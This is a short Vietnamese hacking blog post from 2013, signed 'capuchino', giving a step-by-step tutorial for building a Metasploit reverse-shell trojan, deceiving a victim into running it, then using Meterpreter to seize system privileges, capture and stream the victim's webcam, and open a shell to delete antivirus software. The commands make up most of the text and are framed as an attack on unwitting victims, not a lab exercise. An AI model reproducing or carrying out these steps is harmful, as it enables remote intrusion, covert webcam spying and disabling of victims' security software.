Thứ Hai, 11 tháng 3, 2013

Tạo trojan ,attack win xem webcam,kill antivirus

Đầu tiên ta tạo một con trojan để gửi cho victim nhé.
Mở terminal lên type
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.201.132 LPORT=4444 X > /root/Desktop/capuchino.exe


Lệnh này tạo ra một con trojan tên là capuchino.exe trỏ về host  là LHOST=192.168.201.132 [IP máy mình ấy ,dùng ifconfig để lấy ip máy mình nhé ] Port lắng nghe là 4444 ,file trojan tạo ra nằm ở Desktop.
Sau khi tạo ra con trojan này thì tìm cách lừa đưa victim chạy :))

Rồi ta mở msfconsole lên
type:msfconsole
tíếp type như sau
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.201.132
 ở đây là ip máy mình ấy lhost nghĩa là local host,còn rhost nghĩa là remote host
exploit


nếu victim kích vào con trojan mà mình vừa gửi thì nó sẽ tự connect ,xem dưới đây nó mở một session nè.


bi giờ ta thử xem đã đc chưa nhé.Thử lấy thông tin hệ thống
sysinfo


đã đc rồi nhé
ta thử xem webcam trên máy victim nào
đầu tiên
getsystem
webcam_list
webcam_snap
meterpreter > run webcam -p /var/www

sau khi chạy webcam xong thì ta xem webcam trực tiếp luôn :)) và webcam mở trực tiếp tại địa chỉ dưới đây .
/var/www/webcam.htm






TIếp theo giả sử như trên máy nạn nhân có cài antivirus thì làm sao ta có thể tắt anti đi,hoặc diệt nó luôn.điều này cũng rất là dễ.chỉ cần ta vào cmd,rồi tìm đến thư mục cài antivirus đi và xóa hết thư mục này đi thì xem như là xong đúng hem.Ví dụ như Avast thì thường nằm ở C:\Program file\Avast.Xóa thư mục này đi là oke.
Thao tác như sau
getsystem
shell
bi giờ ta thấy giao diện terminal đã trở thành cmd rồi á.
ta thao tác thử xem sao nhé

Đến đây rồi thì kill antivirus là chuyện đơn giản đúng hem.
tut by capuchino.


2 nhận xét: